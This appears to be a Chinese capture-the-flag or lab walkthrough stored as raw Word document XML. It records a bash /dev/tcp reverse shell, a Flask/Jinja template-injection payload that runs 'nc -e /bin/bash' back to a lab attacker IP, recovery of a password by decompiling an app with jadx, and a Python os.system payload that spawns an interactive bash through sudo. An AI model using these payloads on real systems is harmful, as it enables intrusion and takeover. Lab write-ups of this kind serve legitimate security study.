      <w:r w:rsidRPr="00176F61">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00176F61">
        <w:t>/192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F61">
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F61">
        <w:t>/66</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F61">
        <w:t xml:space="preserve"> 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D1348" w14:textId="2B269740" w:rsidR="00176F61" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>config._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>_class__.__init__.__globals__[%27os%27].popen(%27nc%20-e%20/bin/bash%20192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>1.13</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>%20</w:t>
      </w:r>
      <w:r>
        <w:t>666</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>%20%20sh%27).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57D074" w14:textId="41C06CB6" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E1746FB" wp14:editId="389A6566">
            <wp:extent cx="5274310" cy="1068705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1987625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256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E7EC" w14:textId="4A356726" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功，用python优化一下shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B322CFA" w14:textId="064CB6B4" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4809BD01" wp14:editId="38A4B03F">
            <wp:extent cx="4778154" cy="807790"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1549559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593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AC6D" w14:textId="6FC83881" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B7E72" w14:textId="733CDDAF" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01116688" wp14:editId="3512D69B">
            <wp:extent cx="5274310" cy="667385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="286792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924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2064" w14:textId="36714F84" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34043FF7" wp14:editId="2A3154D9">
            <wp:extent cx="5274310" cy="1016635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2048700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009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95C4" w14:textId="541F3FA4" w:rsidR="0015704A" w:rsidRDefault="0015704A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0015704A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD9640C" wp14:editId="27E008A9">
            <wp:extent cx="4549534" cy="403895"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1400199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99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9521" w14:textId="761D694A" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现好东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D40BD" w14:textId="1CFAE91B" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下这个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250B8E8" w14:textId="1B00F077" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E15C18D" wp14:editId="54A712E1">
            <wp:extent cx="5274310" cy="2371090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="106597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709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45A" w14:textId="55907D35" w:rsidR="00FE5D4E" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A7AFE" w14:textId="2F6EC232" w:rsidR="00FE5D4E" w:rsidRDefault="0015704A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0015704A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471CBFA5" wp14:editId="480C0B1C">
            <wp:extent cx="5274310" cy="255270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1856635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58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AA28" w14:textId="4DD16FB9" w:rsidR="0015704A" w:rsidRDefault="0015704A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0015704A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B7F3C1" wp14:editId="1CC650EA">
            <wp:extent cx="5274310" cy="1340485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1613720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204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BE46" w14:textId="280021FF" w:rsidR="0015704A" w:rsidRDefault="0015704A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12E38C" w14:textId="03BF4084" w:rsidR="0015704A" w:rsidRDefault="0015704A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0015704A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1ABD13" wp14:editId="4923179F">
            <wp:extent cx="5274310" cy="2139315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="79065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56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1941" w14:textId="7284E8ED" w:rsidR="0015704A" w:rsidRDefault="0015704A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来看这个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079BD27" w14:textId="2DA725CA" w:rsidR="0015704A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099170A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60CE07DD" wp14:editId="413A34A0">
            <wp:extent cx="5274310" cy="4387215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1113546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465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下载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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37757882" w14:textId="6290298C" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099170A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F96DC77" wp14:editId="1A7F4A0D">
            <wp:extent cx="5274310" cy="1182370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="715089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897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E266" w14:textId="690C8C5A" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13528DE7" w14:textId="33D44C01" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们需要复制文件过去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF84FCD" w14:textId="522AB857" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099170A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BEEB7D9" wp14:editId="44BDD30E">
            <wp:extent cx="5274310" cy="370840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1340621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12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EEF7" w14:textId="18848BBF" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限不够，需要写入权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27222171" w14:textId="5713764B" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099170A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20AE0D24" wp14:editId="503AD526">
            <wp:extent cx="3817951" cy="640135"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1830529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94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C61F" w14:textId="1313EBE7" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0099170A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E4DC7D8" wp14:editId="3FC7B08B">
            <wp:extent cx="5274310" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="2015008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088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19D3" w14:textId="35481703" w:rsidR="0099170A" w:rsidRDefault="0099170A" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标文件缺少7</w:t>
      </w:r>
      <w:r>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34CD7E" w14:textId="4D224D99" w:rsidR="0099170A" w:rsidRDefault="00C13E04" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C13E04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3807D16E" wp14:editId="1EFA438D">
            <wp:extent cx="4237087" cy="3025402"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="751269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697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BBE" w14:textId="5D4B7526" w:rsidR="00C13E04" w:rsidRDefault="00C13E04" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来进行复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738297D5" w14:textId="0D3AAB70" w:rsidR="00C13E04" w:rsidRDefault="00C13E04" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C13E04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECF9133" wp14:editId="47EFFDE9">
            <wp:extent cx="5274310" cy="379730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="163456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625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7ACD" w14:textId="64B209DA" w:rsidR="00C13E04" w:rsidRDefault="00C13E04" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C13E04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D30D221" wp14:editId="7FF09AC4">
            <wp:extent cx="5274310" cy="1091565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="196790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063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7416" w14:textId="3C20F33E" w:rsidR="00C13E04" w:rsidRDefault="00C13E04" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就是逆向了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A2C4D" w14:textId="77777777" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>Release 1.4.7 · skylot/jadx · GitHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="398A7929" w14:textId="59A25A1B" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个工具，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启动文件拖进去是这个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F55A5" w14:textId="77F5ABC3" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006F0977">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26CB5C51" wp14:editId="62A1484B">
            <wp:extent cx="2575783" cy="3193057"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1208395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954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675F" w14:textId="00D4B1F2" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇事不决搜索密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30850C" w14:textId="18B0DAC7" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006F0977">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C5C04F" wp14:editId="586F8198">
            <wp:extent cx="5274310" cy="3296285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="55787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55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9C18" w14:textId="0E527AC4" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0977">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58B2BBB2" wp14:editId="1C2221ED">
            <wp:extent cx="5274310" cy="2176145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="951716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66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77">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0977">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDFB03F" wp14:editId="61D5690B">
            <wp:extent cx="5274310" cy="1791970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="831788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882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D4C1" w14:textId="29C003ED" w:rsidR="006F0977" w:rsidRDefault="006F0977" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>发现这里应该有问题</w:t>
      </w:r>
      <w:r w:rsidR="00393C7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>，下面密码生成的方式的解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B9703" w14:textId="082A8BAB" w:rsidR="006F0977" w:rsidRDefault="00393C7B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00393C7B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="633CDE5C" wp14:editId="25FBE18B">
            <wp:extent cx="5274310" cy="2498090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="191869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91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D0CF" w14:textId="7FD0EF62" w:rsidR="00393C7B" w:rsidRDefault="00393C7B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码应该是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>ye.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>of.the.tiger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFD4B9" w14:textId="060A45D2" w:rsidR="00393C7B" w:rsidRDefault="00393C7B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F4F8BC" w14:textId="054C5408" w:rsidR="00393C7B" w:rsidRDefault="00743040" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00743040">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C4065A9" wp14:editId="2D88EB6C">
            <wp:extent cx="2743438" cy="853514"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="57827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711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22BD" w14:textId="4F9AA9C5" w:rsidR="00743040" w:rsidRDefault="00743040" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？？？密码错了？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A475606" w14:textId="09A86C58" w:rsidR="00743040" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C014E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D511602" wp14:editId="474BD846">
            <wp:extent cx="5274310" cy="2362835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="155901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198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06CA" w14:textId="0D4A6084" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好吧官方下载地址有提示（好好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这么完）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F7F406" w14:textId="1B760124" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试一下就出来了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FDFB1" w14:textId="2D8D36A7" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C014E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D766E40" wp14:editId="63704EF6">
            <wp:extent cx="2697714" cy="830652"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="769246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464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4824" w14:textId="781676F0" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C014E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10DDCA74" wp14:editId="27AC81F5">
            <wp:extent cx="2911092" cy="563929"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="251442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426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32D8" w14:textId="66F14D58" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41112529" w14:textId="547725FA" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C014E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F8C4BA" wp14:editId="29FE50B1">
            <wp:extent cx="5274310" cy="6092190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="498936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665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DF74" w14:textId="49E2CB01" w:rsidR="008C014E" w:rsidRDefault="008C014E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点不在历史主要是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00030BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有权限先跑一下</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00030BAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>咯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="776AEBCD" w14:textId="4FCE96FD" w:rsidR="008C014E" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00030BAC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43833C48" wp14:editId="4213D283">
            <wp:extent cx="5274310" cy="1286510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1573178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788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8D3B" w14:textId="51596133" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ex啊没事，再来一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F96C16" w14:textId="29FFD728" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00030BAC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56EDE86E" wp14:editId="112B4442">
            <wp:extent cx="5274310" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1277147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4764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B62C" w14:textId="49BFB6E6" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xec知道怎么弄了直接1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4C74E" w14:textId="7358C182" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00030BAC">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00030BAC">
        <w:t>os;os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00030BAC">
        <w:t>.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00030BAC">
        <w:t>("/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00030BAC">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00030BAC">
        <w:t>");</w:t>
      </w:r>
    </w:p>
